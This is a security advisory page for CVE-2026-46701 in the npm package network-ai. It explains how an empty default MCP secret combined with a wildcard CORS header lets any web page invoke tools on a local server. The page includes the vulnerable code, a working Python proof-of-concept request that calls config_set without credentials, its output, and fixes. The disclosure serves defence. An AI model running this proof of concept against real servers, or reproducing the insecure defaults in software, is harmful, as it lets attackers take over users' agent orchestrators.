GHSA-J3VX-CX2R-PVG8

Vulnerability from github – Published: 2026-05-21 22:39 – Updated: 2026-05-21 22:39
VLAI
Summary
Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret
Details

Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret

Field Value
Repository Jovancoding/Network-AI
Affected version v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac)

Summary

The MCP SSE server defaults to an empty secret (process.env['NETWORK_AI_MCP_SECRET'] ?? '' at bin/mcp-server.ts:89), which causes _isAuthorized (lib/mcp-transport-sse.ts:254) to return true unconditionally for every request — no Authorization header is required. Simultaneously, _handleRequest sets Access-Control-Allow-Origin: * (lib/mcp-transport-sse.ts:272) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools — including config_set, agent_spawn, and blackboard_write — against a default-configured localhost server.

Affected Code

bin/mcp-server.ts:89 — default secret resolves to empty string, enabling open access

    secret: process.env['NETWORK_AI_MCP_SECRET'] ?? '',

lib/mcp-transport-sse.ts:254 — auth guard short-circuits to true when secret is falsy

  private _isAuthorized(req: http.IncomingMessage): boolean {
    if (!this._opts.secret) return true;
    const authHeader = req.headers['authorization'];
    if (typeof authHeader !== 'string') return false;
    const parts = authHeader.split(' ');
    return parts[0]?.toLowerCase() === 'bearer' && parts[1] === this._opts.secret;
  }

lib/mcp-transport-sse.ts:272 — wildcard CORS header applied unconditionally before any auth check

  private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {
    // CORS — allow any MCP client to connect
    res.setHeader('Access-Control-Allow-Origin', '*');
    res.setHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS');
    res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');

lib/mcp-transport-sse.ts:367-368 — authenticated path dispatches parsed JSON-RPC frame directly to handleRPC with no further caller validation

        const rpc = JSON.parse(body) as McpJsonRpcRequest;
        const response = await this._bridge.handleRPC(rpc);

Any cross-origin browser request reaches handleRPC because _isAuthorized returns true (empty secret) and the Access-Control-Allow-Origin: * header lets the browser expose the response to the calling script.

Proof of Concept

Environment - Network-AI v5.4.4 (latest) - Docker container bound to 127.0.0.1:3001 - Python 3 + requests

poc.py

import sys
import requests

BASE = "http://127.0.0.1:3001"

# Step 1: Verify CORS wildcard (simulating cross-origin preflight)
preflight = requests.options(
    f"{BASE}/mcp",
    headers={
        "Origin": "http://evil.example.com",
        "Access-Control-Request-Method": "POST",
        "Access-Control-Request-Headers": "Content-Type",
    },
)
acao = preflight.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] OPTIONS /mcp -> {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}")
if acao != "*":
    print(f"RESULT: FAIL — expected ACAO='*', got {acao!r}")
    sys.exit(1)

# Step 2: Invoke config_set with NO Authorization header from cross-origin
rpc_payload = {
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
        "name": "config_set",
        "arguments": {
            "key": "maxParallelAgents",
            "value": "999"
        }
    }
}
resp = requests.post(
    f"{BASE}/mcp",
    json=rpc_payload,
    headers={
        "Content-Type": "application/json",
        "Origin": "http://evil.example.com",
        # No Authorization header — exploiting empty-secret bypass
    },
)
print(f"[*] POST /mcp (no auth, cross-origin) -> {resp.status_code}")
print(f"[*] Response body: {resp.text[:800]}")
resp_acao = resp.headers.get("Access-Control-Allow-Origin", "")
print(f"[*] Response Access-Control-Allow-Origin: {resp_acao!r}")
if resp.status_code != 200:
    print(f"RESULT: FAIL — expected 200, got {resp.status_code}")
    sys.exit(1)

body = resp.json()
result_content = body.get("result", {})
is_error = result_content.get("isError", True)
if is_error:
    print(f"RESULT: FAIL — tool returned isError=true: {result_content}")
    sys.exit(1)

# Step 3: Confirm CORS header on actual response (browser can read it)
if resp_acao != "*":
    print(f"RESULT: FAIL — response ACAO not '*', browser would block read: {resp_acao!r}")
    sys.exit(1)

print(f"RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)")

Output

[*] OPTIONS /mcp -> 204, Access-Control-Allow-Origin: '*'
[*] POST /mcp (no auth, cross-origin) -> 200
[*] Response body: {"jsonrpc":"2.0","id":1,"result":{"content":[{"type":"text","text":"{\"ok\":true,\"tool\":\"config_set\",\"data\":{\"key\":\"maxParallelAgents\",\"previous\":null,\"current\":999,\"applied\":true}}"}],"isError":false}}
[*] Response Access-Control-Allow-Origin: '*'
RESULT: PASS — unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO='*'; config_set executed without credentials (maxParallelAgents set to 999)

Verified conditions 1. OPTIONS /mcp → 204, Access-Control-Allow-Origin: * — browser preflight accepted by server 2. POST /mcp (no Authorization header) → 200, isError: falseconfig_set executed without credentials 3. Response Access-Control-Allow-Origin: * — response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page

Impact

Any web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (config_set); the same vector applies to agent_spawn (spawning arbitrary agents), blackboard_write / blackboard_delete (corrupting shared agent state), and token_create / token_revoke (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).

Remediation

  1. Require a non-empty secret at startup: in bin/mcp-server.ts, reject launch when args.secret is empty and --stdio is not set: typescript if (!args.secret && !args.stdio) { console.error('ERROR: --secret <token> or NETWORK_AI_MCP_SECRET must be set for SSE mode.'); process.exit(1); }
  2. Restrict CORS to localhost origins only: in lib/mcp-transport-sse.ts:_handleRequest, replace the wildcard with an allowlist: typescript const origin = req.headers['origin'] ?? ''; const allowed = /^https?:\/\/(localhost|127\.0\.0\.1)(:\d+)?$/.test(origin); res.setHeader('Access-Control-Allow-Origin', allowed ? origin : ''); res.setHeader('Vary', 'Origin');
  3. Move CORS headers after the auth check so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (/sse) if cross-origin streaming is needed and not on /mcp.
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.4.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "network-ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.4.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46701"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T22:39:59Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "# Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret\n\n| Field            | Value |\n| ---------------- | ----- |\n| Repository       | Jovancoding/Network-AI |\n| Affected version | v5.4.4 (commit c12686e181f231cf8d7bcf836a96d78f0f0877ac) |\n\n## Summary\n\nThe MCP SSE server defaults to an empty secret (`process.env[\u0027NETWORK_AI_MCP_SECRET\u0027] ?? \u0027\u0027` at `bin/mcp-server.ts:89`), which causes `_isAuthorized` (`lib/mcp-transport-sse.ts:254`) to return `true` unconditionally for every request \u2014 no `Authorization` header is required. Simultaneously, `_handleRequest` sets `Access-Control-Allow-Origin: *` (`lib/mcp-transport-sse.ts:272`) on every response, so a cross-origin browser fetch can read the result without restriction. An unauthenticated attacker who can lure a user to a malicious web page can invoke all 22 exposed MCP tools \u2014 including `config_set`, `agent_spawn`, and `blackboard_write` \u2014 against a default-configured localhost server.\n\n## Affected Code\n\n`bin/mcp-server.ts:89` \u2014 default secret resolves to empty string, enabling open access\n\n```typescript\n    secret: process.env[\u0027NETWORK_AI_MCP_SECRET\u0027] ?? \u0027\u0027,\n```\n\n`lib/mcp-transport-sse.ts:254` \u2014 auth guard short-circuits to `true` when secret is falsy\n\n```typescript\n  private _isAuthorized(req: http.IncomingMessage): boolean {\n    if (!this._opts.secret) return true;\n    const authHeader = req.headers[\u0027authorization\u0027];\n    if (typeof authHeader !== \u0027string\u0027) return false;\n    const parts = authHeader.split(\u0027 \u0027);\n    return parts[0]?.toLowerCase() === \u0027bearer\u0027 \u0026\u0026 parts[1] === this._opts.secret;\n  }\n```\n\n`lib/mcp-transport-sse.ts:272` \u2014 wildcard CORS header applied unconditionally before any auth check\n\n```typescript\n  private _handleRequest(req: http.IncomingMessage, res: http.ServerResponse): void {\n    // CORS \u2014 allow any MCP client to connect\n    res.setHeader(\u0027Access-Control-Allow-Origin\u0027, \u0027*\u0027);\n    res.setHeader(\u0027Access-Control-Allow-Methods\u0027, \u0027GET, POST, OPTIONS\u0027);\n    res.setHeader(\u0027Access-Control-Allow-Headers\u0027, \u0027Content-Type, Authorization\u0027);\n```\n\n`lib/mcp-transport-sse.ts:367-368` \u2014 authenticated path dispatches parsed JSON-RPC frame directly to `handleRPC` with no further caller validation\n\n```typescript\n        const rpc = JSON.parse(body) as McpJsonRpcRequest;\n        const response = await this._bridge.handleRPC(rpc);\n```\n\nAny cross-origin browser request reaches `handleRPC` because `_isAuthorized` returns `true` (empty secret) and the `Access-Control-Allow-Origin: *` header lets the browser expose the response to the calling script.\n\n## Proof of Concept\n\n**Environment**\n- Network-AI v5.4.4 (latest)\n- Docker container bound to `127.0.0.1:3001`\n- Python 3 + `requests`\n\n**poc.py**\n```python\nimport sys\nimport requests\n\nBASE = \"http://127.0.0.1:3001\"\n\n# Step 1: Verify CORS wildcard (simulating cross-origin preflight)\npreflight = requests.options(\n    f\"{BASE}/mcp\",\n    headers={\n        \"Origin\": \"http://evil.example.com\",\n        \"Access-Control-Request-Method\": \"POST\",\n        \"Access-Control-Request-Headers\": \"Content-Type\",\n    },\n)\nacao = preflight.headers.get(\"Access-Control-Allow-Origin\", \"\")\nprint(f\"[*] OPTIONS /mcp -\u003e {preflight.status_code}, Access-Control-Allow-Origin: {acao!r}\")\nif acao != \"*\":\n    print(f\"RESULT: FAIL \u2014 expected ACAO=\u0027*\u0027, got {acao!r}\")\n    sys.exit(1)\n\n# Step 2: Invoke config_set with NO Authorization header from cross-origin\nrpc_payload = {\n    \"jsonrpc\": \"2.0\",\n    \"id\": 1,\n    \"method\": \"tools/call\",\n    \"params\": {\n        \"name\": \"config_set\",\n        \"arguments\": {\n            \"key\": \"maxParallelAgents\",\n            \"value\": \"999\"\n        }\n    }\n}\nresp = requests.post(\n    f\"{BASE}/mcp\",\n    json=rpc_payload,\n    headers={\n        \"Content-Type\": \"application/json\",\n        \"Origin\": \"http://evil.example.com\",\n        # No Authorization header \u2014 exploiting empty-secret bypass\n    },\n)\nprint(f\"[*] POST /mcp (no auth, cross-origin) -\u003e {resp.status_code}\")\nprint(f\"[*] Response body: {resp.text[:800]}\")\nresp_acao = resp.headers.get(\"Access-Control-Allow-Origin\", \"\")\nprint(f\"[*] Response Access-Control-Allow-Origin: {resp_acao!r}\")\nif resp.status_code != 200:\n    print(f\"RESULT: FAIL \u2014 expected 200, got {resp.status_code}\")\n    sys.exit(1)\n\nbody = resp.json()\nresult_content = body.get(\"result\", {})\nis_error = result_content.get(\"isError\", True)\nif is_error:\n    print(f\"RESULT: FAIL \u2014 tool returned isError=true: {result_content}\")\n    sys.exit(1)\n\n# Step 3: Confirm CORS header on actual response (browser can read it)\nif resp_acao != \"*\":\n    print(f\"RESULT: FAIL \u2014 response ACAO not \u0027*\u0027, browser would block read: {resp_acao!r}\")\n    sys.exit(1)\n\nprint(f\"RESULT: PASS \u2014 unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO=\u0027*\u0027; config_set executed without credentials (maxParallelAgents set to 999)\")\n```\n\n**Output**\n```\n[*] OPTIONS /mcp -\u003e 204, Access-Control-Allow-Origin: \u0027*\u0027\n[*] POST /mcp (no auth, cross-origin) -\u003e 200\n[*] Response body: {\"jsonrpc\":\"2.0\",\"id\":1,\"result\":{\"content\":[{\"type\":\"text\",\"text\":\"{\\\"ok\\\":true,\\\"tool\\\":\\\"config_set\\\",\\\"data\\\":{\\\"key\\\":\\\"maxParallelAgents\\\",\\\"previous\\\":null,\\\"current\\\":999,\\\"applied\\\":true}}\"}],\"isError\":false}}\n[*] Response Access-Control-Allow-Origin: \u0027*\u0027\nRESULT: PASS \u2014 unauthenticated cross-origin POST /mcp (no Bearer token) succeeded with HTTP 200 and ACAO=\u0027*\u0027; config_set executed without credentials (maxParallelAgents set to 999)\n```\n\n**Verified conditions**\n1. `OPTIONS /mcp` \u2192 204, `Access-Control-Allow-Origin: *` \u2014 browser preflight accepted by server\n2. `POST /mcp` (no Authorization header) \u2192 200, `isError: false` \u2014 `config_set` executed without credentials\n3. Response `Access-Control-Allow-Origin: *` \u2014 response is readable by the calling script in a browser context, confirming the attack is viable from a cross-origin malicious page\n\n## Impact\n\nAny web page visited by a user who has the Network-AI MCP server running locally (default port 3001, no secret) can silently invoke all 22 MCP tools without credentials. Verified impact includes arbitrary orchestrator configuration mutation (`config_set`); the same vector applies to `agent_spawn` (spawning arbitrary agents), `blackboard_write` / `blackboard_delete` (corrupting shared agent state), and `token_create` / `token_revoke` (tampering with token management). Confidentiality impact is limited to data readable via MCP tools (blackboard contents, audit log queries); integrity impact is high because core orchestrator state can be overwritten; availability impact is low (service continues running but with attacker-controlled configuration).\n\n## Remediation\n\n1. **Require a non-empty secret at startup**: in `bin/mcp-server.ts`, reject launch when `args.secret` is empty and `--stdio` is not set:\n   ```typescript\n   if (!args.secret \u0026\u0026 !args.stdio) {\n     console.error(\u0027ERROR: --secret \u003ctoken\u003e or NETWORK_AI_MCP_SECRET must be set for SSE mode.\u0027);\n     process.exit(1);\n   }\n   ```\n2. **Restrict CORS to localhost origins only**: in `lib/mcp-transport-sse.ts:_handleRequest`, replace the wildcard with an allowlist:\n   ```typescript\n   const origin = req.headers[\u0027origin\u0027] ?? \u0027\u0027;\n   const allowed = /^https?:\\/\\/(localhost|127\\.0\\.0\\.1)(:\\d+)?$/.test(origin);\n   res.setHeader(\u0027Access-Control-Allow-Origin\u0027, allowed ? origin : \u0027\u0027);\n   res.setHeader(\u0027Vary\u0027, \u0027Origin\u0027);\n   ```\n3. **Move CORS headers after the auth check** so a rejected request never advertises cross-origin access, or apply CORS only on the SSE endpoint (`/sse`) if cross-origin streaming is needed and not on `/mcp`.",
  "id": "GHSA-j3vx-cx2r-pvg8",
  "modified": "2026-05-21T22:39:59Z",
  "published": "2026-05-21T22:39:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Jovancoding/Network-AI/security/advisories/GHSA-j3vx-cx2r-pvg8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Jovancoding/Network-AI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Network-AI: Unauthenticated Cross-Origin MCP Tool Invocation via Empty Default Secret"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…